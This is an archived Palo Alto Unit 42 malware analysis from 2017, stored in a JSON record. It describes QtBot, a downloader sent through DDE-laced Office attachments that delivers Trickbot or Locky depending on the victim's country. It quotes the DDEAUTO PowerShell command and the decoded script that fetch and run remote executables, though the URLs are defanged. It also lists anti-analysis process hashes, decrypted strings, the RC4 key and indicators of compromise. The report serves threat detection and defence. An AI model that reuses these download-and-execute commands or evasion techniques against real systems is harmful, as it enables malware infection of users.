{
	"id": "331f999e-f3d1-4db9-9093-452900471f04",
	"created_at": "2026-04-06T00:11:00.977581Z",
	"updated_at": "2026-04-10T13:12:39.957387Z",
	"deleted_at": null,
	"sha1_hash": "1e833c423ac4022d808878fcd826829144ad92cc",
	"title": "Everybody Gets One: QtBot Used to Distribute Trickbot and Locky",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1935667,
	"plain_text": "Everybody Gets One: QtBot Used to Distribute Trickbot and Locky\r\nBy Brandon Levene, Brandon Young, Dominik Reichel\r\nPublished: 2017-11-01 · Archived: 2026-04-02 12:32:18 UTC\r\nIntroduction\r\nThe most common Locky and Trickbot affiliates are being distributed via shared malspam campaigns. Unit 42 and\r\nexternal malware researchers believe the payloads are geo-targeted. Previously, geo-targeting was controlled by a\r\nrelatively simplistic VBA script which utilized GeoIP lookup services and parsed the country code to determine the\r\ncompromised host’s location. With this information, the VBA script would enter a loop checking for the presence of the\r\ncountry codes: UK, IE, AU, GB, LU, or BE and, if any of those country codes was present, URIs to serve Trickbot\r\nwere selected for download and execution. If this check failed, Locky would be served instead.\r\nRecently, Unit 42 researcher Brad Duncan observed Necurs malspam campaigns distributing Microsoft Office\r\ndocuments that were abusing DDE. These documents load an intermediate downloader which we have tagged in\r\nAutoFocus as “QtBot”. QtBot replaces the previously discussed VBA and features a robust anti-analysis suite to protect\r\nitself. This new downloader is responsible for loading the final payload, either Locky or Trickbot, again based on\r\nGeoIP. Palo Alto Networks has observed more than 4 million unique sessions with QtBot activity since October 19th,\r\n2017.\r\nThe Lure\r\nThe malicious DDE documents are included as attachments to malspam lures like the one below (seen 10/24/2017):\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 1 of 14\n\nFigure 1. Shows an example email lure with a malicious document that uses DDE to deliver a payload.\r\nTypically, these lures are very simple. Most of the observed lures fall either within the “Financial Statement” category\r\n(Invoice, Billing, Receipt) or “File Transfer” category (efax, file scan). This campaign relies on the user to download\r\nthe attachment, open it, and click through several dialog boxes. The attached document,\r\nbb92218314ffdc450320f1d44d8a2fe163c585827d9ca3e9a00cb2ea0e27f0c9, contains the following DDE object:\r\n[URL Defanged]\r\nDDEAUTO C:\\\\Windows\\\\System32\\\\cmd.exe \"/k powershell.exe -NonI -\r\nnoexit -NoP -sta $sr=(new-object IO.StreamReader\r\n((([Net.WebRequest]::Create('hXXp://burka.ch/JHhdg33')).GetResponse())\r\n.GetResponseStream())).ReadToEnd();powershell.exe -e $sr\"\r\nNetwork Traffic\r\nLet’s examine the network traffic. Immediately following the user’s click-throughs of three dialog boxes, the following\r\nHTTP GET request is issued. Interestingly, its likely this initial command and control server is simply a compromised\r\nwebhost running a vulnerable version of PLESK as can be seen by the X-Powered-By header in the HTTP response.\r\nFigure 2. DDE downloads a base64 blob for execution. Also, an interesting note: this initial server hosting the\r\n scriptlet is using PLESK and is likely compromised.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 2 of 14\n\nThe base64 blob decodes to the following [URLs defanged]:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n$urls = \"hXXp://aurea-art[.]ru/incrHG32\",\"hXXp://castellodimontegioco[.]com/incrHG32\",\"hXXp:\r\n//nl.flipcapella[.]com/incrHG32\",\"hXXp://dotecnia[.]cl/incrHG32\",\"hXXp\r\n://christakranzl[.]at/incrHG32\"\r\nforeach($url in $urls){\r\nTry\r\n{\r\nWrite-Host $url\r\n$fp = \"$env:temp\\theyweare64.exe\"\r\nWrite-Host $fp\r\n$wc = New-Object System.Net.WebClient\r\n$wc.DownloadFile($url, $fp)\r\nStart-Process $fp\r\nbreak\r\n}\r\nCatch\r\n{\r\n   Write-Host $_.Exception.Message\r\n}\r\n}\r\nThe entire list is iterated over until a valid download location is found (this can be observed in the cmd.exe window\r\nwhich is spawned in the background by the initial DDE execution). Once a live command and control server responds,\r\nthe QtBot binary (798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120) is downloaded in the\r\nclear.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 3 of 14\n\nFigure 3. Download of the QtBot downloader, with the executable in the clear. Note that the Content-Type doesn’t\r\nmatch.\r\nOnce the QtBot binary has been downloaded, its executed from the user’s %temp% directory using the PowerShell\r\ndirective Start-Process which can be seen in the decoded base64 blob included in the code block above. When QtBot is\r\nstarted, it initially performs a connectivity check to the legitimate domain, ds.download.windowsupdate[.]com, via an\r\nHTTP POST request.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 4 of 14\n\nFigure 4. Downloader component issues a request to an innocuous domain as a connectivity check.\r\nFinally, once the connectivity check passes, QtBot will beacon back to its command and control server using an HTTP\r\nPOST request with an RC4 encrypted payload and await a response which is encrypted with the same RC4 key. The\r\nUser-Agent “Windows-Update-Agent” in the connectivity check, initial check-in, and final payload delivery are all\r\nidentical.\r\nFor the network traffic below, we will use the QtBot sample,\r\nd97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2, as at the time of analysis the command\r\nand control server was still live and serving geo specific payloads.\r\nIn cases where the geolocation matches a set list (we believe this list is likely identical to the earlier VBA discussed in\r\nthe Introduction section), we will see the traffic below.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 5 of 14\n\nFigure 5. The downloader Trojan posts data back to the command and control server. This likely determines\r\ngeolocation based targeting, this request led to the download of Trickbot as we used a UK based exit point. Trickbot\r\ndownload can be seen in Figure 6.  Note the user-agent header is identical to that of the connectivity check in Figure 4.\r\nDue to the host being within the UK, we received an encrypted Trickbot payload. The decrypted Trickbot observed in\r\nthe request below is 4fcee2679cc65585cc1c1c7baa020ec262a2b7fb9b8dc7529a8f73fab029afad.\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 6 of 14\n\nFigure 6. Payload downloaded by the intermediate downloader. In this case, Trickbot.\r\nIn the following figures, we see a host POST data back to the C2 and receive a slightly different response. This is\r\nbecause the host is in a location not specifically targeted for Trickbot delivery. Thus, we expect to see a different\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 7 of 14\n\ndownload location and likely a Locky payload.\r\nFigure 7.  The downloader Trojan posts data back to the command and control server. This likely determines\r\ngeolocation based targeting, this request led to the download of Locky as we used a CA based exit point. Locky\r\ndownload can be seen in Figure 8.\r\nBelow we see a different payload from a different location due to the server’s response. In this case the payload is an\r\nencrypted Locky binary. This decrypted binary is\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 8 of 14\n\n9d2ce15fd9112d52fa09c543527ef0b5bf07eb4c07794931c5768e403c167d49.\r\nFigure 8. Payload downloaded by the intermediate downloader. In this case, Locky.\r\nWith the network behavior laid out from initial execution to payload delivery, lets take a closer look at the intermediate\r\ndownloader, QtBot.\r\nQtBot Analysis\r\nThe QtBot downloader is a Windows executable file that decrypts an importless stub into memory. This payload is later\r\ninjected into msiexec.exe using common techniques.  The payload then decrypts the second stage shellcode and injects\r\nit into a newly spawned svchost.exe process.  This svchost.exe acts as the handler for the final payload.\r\nWhen QtBot initially executes, a new thread is created which is responsible for process scanning. This process\r\nscanning is used to identify analysis tools and, if any are found, terminate the malware’s further execution. This check\r\nis periodically repeated on a loop. Process hashes are calculated by lower casing the process name, calculating the\r\ncrc32 of the result, and XORing the crc32 value with 0x2e5d47c8.  The XOR value appears to change on a regular\r\nbasis, thus the hashes below only apply to\r\n798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120. The following hash values are checked\r\nagainst running processes:\r\n1\r\n2\r\n3\r\n0x171AF567\r\n0xB713B22E\r\n0x59F3573F - wireshark.exe\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 9 of 14\n\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n0xA9275283 - peid.exe\r\n0x2C533BA3\r\n0xB1FDD418 - x64dbg.exe\r\n0xA7B71C08\r\n0x5BBA66D5\r\n0xFD62D761\r\n0xB01C9DA9 - cff explorer.exe\r\n0xE7AC4C20\r\n0x8718A391 - procexp.exe\r\n0x817D523A - ollydbg.exe\r\n0x9A65393D - lordpe.exe\r\n0x4B1B38C6 - processhacker.exe\r\n0xBD46C402\r\n0x72472F0B - tcpview.exe\r\n0x151648CD\r\n0x4A694A06 - vboxservice.exe\r\n0x956511A3 - sbiesvc.exe\r\n0x09D19890 - vmtoolsd.exe\r\n0x70383CD2\r\n0x40C795F0 - petools.exe\r\n0x6D2607D8 - exeinfope.exe\r\n0x4D9803BC - vboxtray.exe\r\n0x29FBEE3C - windbg.exe\r\n0x0872D0FC\r\n0x28F7E9A8 - idaq.exe\r\n0x3D0598D0 - x32dbg.exe\r\n0x1D141E5D\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 10 of 14\n\n31\r\n32\r\n33\r\n34\r\n0xFCB2810C - python.exe\r\n0x2AA827DB\r\n0xCA9B2CDE\r\n0x75F4F636 - procmon.exe\r\nThe payload then creates randomly generated numerical mutex along with the registry key\r\n“HKCU\\Software\\QtProject”. This registry key has been used in the past by legitimate Qt framework software and is\r\nnot strictly to be considered malicious on its own.\r\nOnce the mutex and registry string are created, the malware uses RC4 with a hardcoded key to decrypt numerous\r\nstrings which are reproduced below (note these strings are from\r\n798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120):\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\ncmd.exe\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\r\nboom\r\nhttp://toundlefa[.]net/\r\nSoftware\\QtProject\r\nmsiexec.exe\r\nsvchost.exe\r\n/c start %s \u0026\u0026 exit\r\ncmd.exe\r\n\\System32\\CompMgmtLauncher.exe\r\nrunas\r\nSoftware\\Classes\\mscfile\r\n\\shell\\open\\command\r\ntmp_file\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\r\n\\Policies\\Explorer\r\n\\Run\r\nCheck Update\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 11 of 14\n\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\nPOST\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nDZCW\r\n6VK3\r\nregsvr32.exe\r\nhttp://ds.download.windowsupdate.com/\r\n{\"rep\":0,\"bid\":\"%s\",\"ver\":%d,\"cam\":\"%s\",\"cis\":%d,\"lvl\":%d,\"adm\":%d,\"bit\":%d,\"osv\":%d,\"osb\":%d,\"tmt\":%d}\r\n{\"rep\":1,\"bid\":\"%s\",\"tid\":\"%s\",\"res\":%d}\r\nThe hardcoded RC4 Key, 0x7A3C5B7CB7FCE715702AA0F4F4EC0935E759FD3B7B6BCC70159D61CF42814B81,\r\nis reused throughout this campaign to encrypt and decrypt network communications.\r\nQtBot includes a function which checks for the keyboard layouts common to former USSR countries, if any are found,\r\nexecution is terminated. This routine is shown below:\r\nFigure 9. Keyboard layout checks in order to prevent infection of former USSR countries.\r\nFor persistence, a temp file is generated with a randomly generated name and stored in %APPDATA%\\Local\\Temp\\ in\r\na randomly named folder.\r\nThis randomly generated value is used for the folder name and is stored in the registry key\r\n“HKCU\\Software\\QtProject” in the value “0FAD2D5E”. The malware stores additional encrypted data in this key:\r\n“0FAD2D5E” – Random Value + Unicode temp file name + length of data blob\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 12 of 14\n\n“0FAD2D5EDZCW” – RC4 Encrypted C2 Domain\r\nSuccessful malware communications use a format string like the one below:\r\n{\"rep\":0,\"bid\":\"%s\",\"ver\":%d,\"cam\":\"%s\",\"cis\":%d,\"lvl\":%d,\"adm\":%d,\"bit\":%d,\"osv\":%d,\"osb\":\r\n%d,\"tmt\":%d}\r\nWhen this is filled in, it would look similar to the following:\r\n{\"rep\":0,\"bid\":\"LD0fJMblnCbrDT8Mvma4Rg==\",\"ver\":256,\"cam\":\"nightboom\",\"cis\":0,\"lvl\":1228\r\n8,\"adm\":1,\"bit\":1,\"osv\":1537,\"osb\":7601,\"tmt\":30}\r\nSome of these values are unknown, though we are able to speculate the nature of their meanings.  We believe they are\r\nas follows:\r\n\"rep\" – communication attempt repetitions from a single host\r\n\"bid\" – binary identification; this value is stored in registry value \"0FAD2D5E\" and is RC4\r\nencrypted and base64 encoded before sending\r\n\"ver\" – likely versioning information\r\n\"cam\" – campaign name\r\n\"cis\" – unknown hardcoded value\r\n\"lvl\" – system integrity level\r\n\"adm\" – if the malware has administrative privileges\r\n\"bit\" – unknown\r\n\"osv\" – operating system version\r\n\"osb\" – operating system build\r\n\"tmt\" – timeout in seconds\r\nSimilarities to Andromeda\r\nExisting analysis of the Andromeda loader and bot reveals some commonalities between Andromeda and QtBot.  The\r\nmost apparent similarities of these two families are the running process hash check  used for anti-analysis, host\r\ninfection denylisting based on language identifiers returned from GetKeyboardLayout, separate infection and task\r\nreports for C2 reporting, and code injection target, msiexec.exe.  At this time due to the seemingly major updates to the\r\nbase Andromeda, which is still active, we are referring to this particular family as a new entity and have created a\r\nseparate identifier in Autofocus, QtBot, to help users differentiate.\r\nConclusion\r\nWhile geographic location specific malware delivery is not a new phenomenon, the combination of two previously\r\ndisparate malware family affiliates utilizing unified malspam campaigns and droppers is an interesting shift in tactics.\r\nQtBot protects itself and the decision tree by which targeting is established and offers a significantly more robust anti-analysis package to stymie analysts.\r\nPalo Alto Networks has observed more than 4 million unique sessions with QtBot behaviors which can be seen with the\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 13 of 14\n\nQtBot tag in AutoFocus. Customers using Wildfire are protected from this threat.\r\nPalo Alto Networks would like to thank researchers at Proofpoint, who identifies this threat as \"QtLoader\", for first\r\nbringing these campaigns to our attention.\r\nIOCs\r\n798aa42748dcb1078824c2027cf6a0d151c14e945cb902382fcd9ae646bfa120 – QtBot\r\nd97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2 – QtBot used for payload differentiation\r\nscreenshots\r\nbb92218314ffdc450320f1d44d8a2fe163c585827d9ca3e9a00cb2ea0e27f0c9 – DDE Dropper\r\n9d2ce15fd9112d52fa09c543527ef0b5bf07eb4c07794931c5768e403c167d49 – Locky\r\n4fcee2679cc65585cc1c1c7baa020ec262a2b7fb9b8dc7529a8f73fab029afad – Trickbot\r\nhXXp://hobystube[.]net – Locky Download Location\r\nhXXp://kengray[.]com – Trickbot Download Location\r\nhXXp://fetchstats[.]net – QtBot C2\r\nhXXp://toundlefa[.]net – QtBot C2\r\nhXXp://aurea-art[.]ru/incrHG32\r\nhXXp://castellodimontegioco[.]com/incrHG32\r\nhXXp://nl.flipcapella[.]com/incrHG32\r\nhXXp://dotecnia[.]cl/incrHG32\r\nhXXp://christakranzl[.]at/incrHG32\r\nhXXp://burka[.]ch/JHhdg33\r\nhXXp://celebrityonline[.]cz – URI varies based on payload\r\nSource: https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nhttps://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/"
	],
	"report_names": [
		"unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky"
	],
	"threat_actors": [],
	"ts_created_at": 1775434260,
	"ts_updated_at": 1775826759,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1e833c423ac4022d808878fcd826829144ad92cc.pdf",
		"text": "https://archive.orkl.eu/1e833c423ac4022d808878fcd826829144ad92cc.txt",
		"img": "https://archive.orkl.eu/1e833c423ac4022d808878fcd826829144ad92cc.jpg"
	}
}